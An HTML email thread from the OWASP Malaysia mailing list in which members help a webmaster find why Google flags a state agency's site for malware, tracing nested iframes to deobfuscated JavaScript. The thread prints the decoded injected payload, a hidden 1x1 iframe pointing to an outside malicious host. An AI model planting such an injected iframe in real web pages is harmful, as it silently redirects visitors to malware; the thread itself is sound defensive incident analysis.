I can see 2 interesting apps/scripts:<br><br>1. mamp<br>2. /opt/analysis/js/js<br><br>care to share? hopefully it is open source ;)<br><br><br><div class="gmail_quote">On Tue, Feb 8, 2011 at 5:50 PM, Adnan bin Mohd Shukor <span dir="ltr">&lt;<a href="mailto:adnan.shukor@gmail.com">adnan.shukor@gmail.com</a>&gt;</span> wrote:<br>

<blockquote class="gmail_quote" style="margin: 0pt 0pt 0pt 0.8ex; border-left: 1px solid rgb(204, 204, 204); padding-left: 1ex;">Here is my bash history:<br>
<br>
xanda:tmp adnan$ history<br>
&lt;snip&gt;<br>
  500  cd /tmp<br>
  501  wget http:/<a href="http://www2.pkink.gov.my/indexsedc.php" target="_blank">www2.pkink.gov.my/indexsedc.php</a><br>
  502  wget <a href="http://www2.pkink.gov.my/indexsedc.php" target="_blank">http://www2.pkink.gov.my/indexsedc.php</a><br>
  503  nano indexsedc.php<br>
  504  wget <a href="http://www2.pkink.gov.my/indexsedc.php" target="_blank">http://www2.pkink.gov.my/indexsedc.php</a><br>
  505  mamp indexsedc.php.1<br>
  506  nano indexsedc.php.1<br>
  507  wget <a href="http://www2.pkink.gov.my/sedc.php" target="_blank">http://www2.pkink.gov.my/sedc.php</a><br>
  508  nano sedc.php<br>
  509  wget <a href="http://www2.pkink.gov.my/default.php" target="_blank">http://www2.pkink.gov.my/default.php</a><br>
  510  nano default.php<br>
  511  nano default.php<br>
  512  clear<br>
&lt;I&#39;ve remove tags and leave clean JavaScript inside&gt;<br>
  513  mv default.php default.txt<br>
  514  /opt/analysis/js/js &lt; default.txt<br>
  515  cat write.log<br>
  516  history<br>
xanda:tmp adnan$<br>
<br>
Below is the output of the cat:<br>
[output]<br>
xanda:tmp adnan$ cat write.log<br>
&lt;iframe width=&quot;1&quot; height=&quot;1&quot;<br>
src=&quot;<a href="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==" target="_blank">http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==</a>&quot;&gt;&lt;/iframe&gt;&quot;&lt;iframe<br>
width=&quot;1&quot; height=&quot;1&quot;<br>
src=&quot;<a href="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==" target="_blank">http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==</a>&quot;&gt;&lt;/iframe&gt;&quot;<br>
[/output]<br>
<br>
<br>
Hint: you might use modified version of spidermonkey to &#39;understand&#39;<br>
the javascript<br>
<br>
Thanks<br>
<div><div></div><div class="h5"><br>
On 8 February 2011 17:38, Mohd Syamsuri &lt;<a href="mailto:msyamsuri@gmail.com">msyamsuri@gmail.com</a>&gt; wrote:<br>
&gt; thanks for the info..<br>
&gt; i will check all the file.<br>
&gt;<br>
&gt; how you found it?<br>
&gt;<br>
&gt; On Tue, Feb 8, 2011 at 5:21 PM, Adnan bin Mohd Shukor<br>
&gt; &lt;<a href="mailto:adnan.shukor@gmail.com">adnan.shukor@gmail.com</a>&gt; wrote:<br>
&gt;&gt;<br>
&gt;&gt; Here is the flow:<br>
&gt;&gt;<br>
&gt;&gt; 1) your indexsedc.php has an iframe to sedc.php<br>
&gt;&gt; 2) and your sedc.php has an iframe to default.php<br>
&gt;&gt; 3) and in default.php (look at the last 2 lines), javascript will<br>
&gt;&gt; actually create an iframe to<br>
&gt;&gt; <a href="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==" target="_blank">asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==</a><br>
&gt;&gt;<br>
&gt;&gt; thanks :)<br>
&gt;&gt;<br>
&gt;&gt; On 8 February 2011 17:07, Mohd Syamsuri &lt;<a href="mailto:msyamsuri@gmail.com">msyamsuri@gmail.com</a>&gt; wrote:<br>
&gt;&gt; &gt; can you point...<br>
&gt;&gt; &gt; my index.htm or indexsedc.php or other file?<br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt; On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor<br>
&gt;&gt; &gt; &lt;<a href="mailto:adnan.shukor@gmail.com">adnan.shukor@gmail.com</a>&gt; wrote:<br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; you have iframe pointed to<br>
&gt;&gt; &gt;&gt; <a href="http://asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==" target="_blank">asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==</a><br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; which is not xss :)<br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;From my personal point of view, its either caused by:<br>
&gt;&gt; &gt;&gt; 1) malware on pc which has been used for ftp/access to the server<br>
&gt;&gt; &gt;&gt; 2) compromised server<br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; you can send your access.log to cyber999@cybersecurity.my or<br>
&gt;&gt; &gt;&gt; <a href="mailto:mycert@mycert.org.my">mycert@mycert.org.my</a> for further analysis :)<br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; thanks<br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; On 8 February 2011 16:00, Mohd Syamsuri &lt;<a href="mailto:msyamsuri@gmail.com">msyamsuri@gmail.com</a>&gt; wrote:<br>
&gt;&gt; &gt;&gt; &gt; I have check it.<br>
&gt;&gt; &gt;&gt; &gt; On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy &lt;<a href="mailto:rastaboyz@gmail.com">rastaboyz@gmail.com</a>&gt;<br>
&gt;&gt; &gt;&gt; &gt; wrote:<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; Hi Mohd Symsuri,<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; Why dont you check on the reason why its being blocked, it might<br>
&gt;&gt; &gt;&gt; &gt;&gt; help.<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=http://www.pkink.gov.my/" target="_blank">http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=http://www.pkink.gov.my/</a><br>


&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=AS:4788" target="_blank">http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=AS:4788</a><br>


&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; Regards,<br>
&gt;&gt; &gt;&gt; &gt;&gt; Kishur<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri &lt;<a href="mailto:msyamsuri@gmail.com">msyamsuri@gmail.com</a>&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; wrote:<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; Assalamualikum and Good day for my fellow friends.<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; I need some advise.<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; Web site Perbadanan kemajuan Iktisad Negeri Kelantan<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; (<a href="http://www.pkink.gov.my" target="_blank">http://www.pkink.gov.my</a>) have been blocked by Google for almost 4<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; days.<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; It said that we host malware on our server Malware Detected! (<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; Google<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; said that!!)<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; What i did is..<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; 1. Scan all the data and upload a new data<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; 2. Check the index.html or index.php<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; 3. Scan using web scanner using<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; <a href="http://www.avgthreatlabs.com/" target="_blank">http://www.avgthreatlabs.com/</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; <a href="http://www.virustotal.com" target="_blank">http://www.virustotal.com</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; but still get block..<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; Googel said Suspected injected code<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; &lt;FRAME SRC=&quot;<a href="http://www2.pkink.gov.my/indexsedc.php" target="_blank">http://www2.pkink.gov.my/indexsedc.php</a>&quot;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; NAME=&quot;confcontent&quot;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; scrolling=yes &gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; I have using this code for almost 2 years<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; What should i do now?<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; --<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; best regard<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; syamsuri<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; _______________________________________________<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; Owasp-Malaysia mailing list<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; OWASP Malaysia Wiki<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; OWASP Malaysia Wiki Facebook<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;&gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; _______________________________________________<br>
&gt;&gt; &gt;&gt; &gt;&gt; Owasp-Malaysia mailing list<br>
&gt;&gt; &gt;&gt; &gt;&gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt;&gt; &gt;&gt; &gt;&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; OWASP Malaysia Wiki<br>
&gt;&gt; &gt;&gt; &gt;&gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; OWASP Malaysia Wiki Facebook<br>
&gt;&gt; &gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; &gt;&gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt; --<br>
&gt;&gt; &gt;&gt; &gt; best regard<br>
&gt;&gt; &gt;&gt; &gt; syamsuri<br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt; _______________________________________________<br>
&gt;&gt; &gt;&gt; &gt; Owasp-Malaysia mailing list<br>
&gt;&gt; &gt;&gt; &gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt;&gt; &gt;&gt; &gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt; OWASP Malaysia Wiki<br>
&gt;&gt; &gt;&gt; &gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt; OWASP Malaysia Wiki Facebook<br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; &gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;&gt; &gt;&gt; &gt;<br>
&gt;&gt; &gt;&gt; _______________________________________________<br>
&gt;&gt; &gt;&gt; Owasp-Malaysia mailing list<br>
&gt;&gt; &gt;&gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt;&gt; &gt;&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; OWASP Malaysia Wiki<br>
&gt;&gt; &gt;&gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;&gt; &gt;&gt;<br>
&gt;&gt; &gt;&gt; OWASP Malaysia Wiki Facebook<br>
&gt;&gt; &gt;&gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt; --<br>
&gt;&gt; &gt; best regard<br>
&gt;&gt; &gt; syamsuri<br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt; _______________________________________________<br>
&gt;&gt; &gt; Owasp-Malaysia mailing list<br>
&gt;&gt; &gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt;&gt; &gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt; OWASP Malaysia Wiki<br>
&gt;&gt; &gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;&gt; &gt;<br>
&gt;&gt; &gt; OWASP Malaysia Wiki Facebook<br>
&gt;&gt; &gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;&gt; &gt;<br>
&gt;&gt; _______________________________________________<br>
&gt;&gt; Owasp-Malaysia mailing list<br>
&gt;&gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt;&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;&gt;<br>
&gt;&gt; OWASP Malaysia Wiki<br>
&gt;&gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;&gt;<br>
&gt;&gt; OWASP Malaysia Wiki Facebook<br>
&gt;&gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;<br>
&gt;<br>
&gt;<br>
&gt; --<br>
&gt; best regard<br>
&gt; syamsuri<br>
&gt;<br>
&gt;<br>
&gt;<br>
&gt; _______________________________________________<br>
&gt; Owasp-Malaysia mailing list<br>
&gt; <a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
&gt; <a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
&gt;<br>
&gt; OWASP Malaysia Wiki<br>
&gt; <a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
&gt;<br>
&gt; OWASP Malaysia Wiki Facebook<br>
&gt; <a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
&gt;<br>
_______________________________________________<br>
Owasp-Malaysia mailing list<br>
<a href="mailto:Owasp-Malaysia@lists.owasp.org">Owasp-Malaysia@lists.owasp.org</a><br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-malaysia" target="_blank">https://lists.owasp.org/mailman/listinfo/owasp-malaysia</a><br>
<br>
OWASP Malaysia Wiki<br>
<a href="http://www.owasp.org/index.php/Malaysia" target="_blank">http://www.owasp.org/index.php/Malaysia</a><br>
<br>
OWASP Malaysia Wiki Facebook<br>
<a href="http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420" target="_blank">http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420</a><br>
</div></div></blockquote></div><br><br clear="all"><br>-- <br>Sharuzzaman Ahmat Raslan<br>